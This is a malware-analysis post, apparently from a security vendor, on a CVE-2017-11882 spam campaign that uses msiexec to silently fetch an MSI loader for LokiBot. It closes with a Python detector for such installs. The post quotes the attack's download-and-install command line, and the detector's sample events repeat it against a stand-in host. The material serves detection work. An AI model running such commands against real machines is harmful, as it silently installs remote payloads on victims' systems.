Back in November 2017, Microsoft patched CVE-2017-11882, a remote code execution vulnerability that affected Microsoft Office. However, this didn't prevent cybercrime groups such as Cobalt from exploiting this vulnerability in order to deliver a variety of malware, including FAREIT, Ursnif, and a cracked version of the Loki infostealer, a keylogger that was primarily advertised as capable of stealing passwords and cryptocurrency wallets.

Recently, we discovered CVE-2017-11882 being exploited again in an attack that uses an uncommon method of installation: the Windows Installer service in Microsoft Windows operating systems. This differs from previous malware that exploited the vulnerability using the Windows executable mshta.exe to run a PowerShell script, which in turn downloads and executes the payload. This attack uses msiexec.exe, the client of the Windows Installer service, instead.

The samples we analyzed seem to be part of a malware spam campaign. It starts off with an email that asks the recipient to confirm a payment they made to the sender. The email contains text written in Korean, which roughly translates to "hello, please check if your PC may be infected by virus or malicious codes," apparently to warn the recipient about possible infections. The email also contains an attached document file labeled "Payment copy.Doc" (detected by Trend Micro as TROJ_CVE201711882.SM), which is supposedly a payment confirmation document. However, the attachment is actually used to exploit CVE-2017-11882.

Figure 2. Spam email containing the document file used to exploit CVE-2017-11882

Figure 3.

The exploitation of this vulnerability leads to the download and installation of a malicious MSI package labeled zus.msi via Windows Installer through the following command line:

call cmd.exe /c msiexec /q /I "hxxps//

msiexec.exe gives the downloaded binary the file name MSIFD83.tmp. Once downloaded, Windows Installer (msiexec.exe) will proceed to install an MSIL or Delphi binary to the system. Depending on the MSI package downloaded, it may contain either a heavily obfuscated Microsoft Intermediate Language (MSIL) or Delphi binary file, which then acts as a loader for the actual payload.

One notable aspect of the package is that it provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. While this is relatively simple, being able to detect and identify the actual payload might be more difficult, since it is contained in the heavily obfuscated MSIL or Delphi binary. The binary launches another randomly-named instance of itself. This instance is then hollowed out and replaced with the malware payload.

Figure 6. Hollowed out instance of MSIL debugger view

So far, we have seen this technique used to deliver a sample we detected as LokiBot (TROJ_LOKI.SMA). However, it is modular enough to deliver other payloads.

Figure 7. The malware sample we identified as a LokiBot variant

Why does it use a new installation method?

Security software has become proficient at monitoring possible downloader processes such as wscript.exe, PowerShell, mshta.exe, winword.exe, and other similar executables that have become increasingly popular methods of installing malicious payloads. Because these methods became so widely used, blocking threats that arrive through them has become relatively easy. However, the use of msiexec.exe to download a malicious MSI package is not something we typically see in most malware.

While other existing malware families use msiexec.exe, such as the Andromeda botnet (detected by Trend Micro as the ANDROM family), the difference is in how this method uses the installer. In Andromeda's case, code is injected into msiexec.exe to download updates and payloads. Another key difference is that when Andromeda downloads its payloads and updates, it immediately downloads and executes a PE file. This method instead uses an MSI package that msiexec.exe recognizes as an installation package, thereby using Windows Installer as intended. Malware has never really needed to install itself through an MSI package.
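For defenders, the thing to key on in this chain is the process-creation event itself: msiexec.exe being handed a URL rather than a local .msi, with a quiet switch, underneath an Office process. The following is an added example written for this post, not Trend Micro's code. It models events on Sysmon Event ID 1 fields (ProcessId, ParentProcessId, Image, CommandLine); the sample events, process IDs and the host example.invalid are constructed, and the choice of eqnedt32.exe (the Equation Editor process affected by CVE-2017-11882) as the ancestor to look for is an assumption drawn from the CVE, not something the post states. Because msiexec legitimately supports installing from a URL, a remote install with no Office ancestor is only rated "medium".

```python
"""Flag process-creation events where msiexec.exe installs a package from a URL,
raising the severity when the call descends from an Office process.

Added example, not code from the original post.  Events are constructed and
modelled on Sysmon Event ID 1; eqnedt32.exe as an Office-side parent is an
assumption taken from the CVE, not from the post.
"""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # its command line


# hxxp(s) is the defanged form analysts use when quoting URLs, as the post does.
REMOTE_URL = re.compile(r"^(?:https?|hxxps?)://", re.IGNORECASE)
# Processes that should never be an ancestor of a package install.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_args(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted spans intact."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def msiexec_install_target(cmdline: str):
    """Return (package, quiet) for an msiexec command line.

    package is the argument following /i, -i or /package (case-insensitive);
    quiet is True for any /q* switch (/q, /qn, /qb, /quiet).  Returns
    (None, quiet) when no install switch is present (e.g. an /x uninstall).
    """
    args = split_args(cmdline)
    package, quiet = None, False
    for i, arg in enumerate(args[1:], start=1):
        if arg[:1] not in "/-":
            continue
        switch = arg[1:].lower()
        if switch in ("i", "package") and i + 1 < len(args):
            package = args[i + 1]
        elif switch.startswith("q"):
            quiet = True
    return package, quiet


def office_ancestor(ev: ProcEvent, by_pid: dict, max_depth: int = 4) -> Optional[str]:
    """Walk up ParentProcessId links and return the first Office image found."""
    cur = ev
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return None
        if basename(cur.image) in OFFICE_IMAGES:
            return basename(cur.image)
    return None


def find_remote_msi_installs(events: list) -> list:
    """Return findings as dicts: pid, package, quiet, office_parent, severity."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if basename(ev.image) != "msiexec.exe":
            continue
        package, quiet = msiexec_install_target(ev.cmdline)
        if package is None or not REMOTE_URL.match(package):
            continue   # local .msi files are how msiexec is normally used
        parent = office_ancestor(ev, by_pid)
        # msiexec can legitimately install from a URL (deployment tools do), so a
        # bare remote install is at most "medium"; an Office ancestor makes it "high".
        severity = "high" if parent else ("medium" if quiet else "low")
        findings.append({"pid": ev.pid, "package": package, "quiet": quiet,
                         "office_parent": parent, "severity": severity})
    return findings


# Constructed sample events: an Equation Editor -> cmd.exe -> msiexec chain
# shaped like the command line quoted in the post, plus two benign installs.
SAMPLE_EVENTS = [
    ProcEvent(900, 600, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              "EQNEDT32.EXE"),
    ProcEvent(1000, 900, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c msiexec /q /I "hxxps://example.invalid/zus.msi"'),
    ProcEvent(1100, 1000, r"C:\Windows\System32\msiexec.exe",
              'msiexec /q /I "hxxps://example.invalid/zus.msi"'),
    ProcEvent(2000, 500, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\7z1900-x64.msi"'),
    ProcEvent(2100, 500, r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://example.invalid/agent.msi /qn"),
]

if __name__ == "__main__":
    for finding in find_remote_msi_installs(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, the chain under EQNEDT32.EXE is reported as "high" and the explorer-launched remote install as "medium", while the local 7-Zip install is ignored. In a real deployment the ancestry walk needs the parent's process GUID rather than a bare PID (PIDs are reused), and the MSI*.tmp file the post mentions is created by legitimate installs too, so it is corroboration rather than a signal on its own.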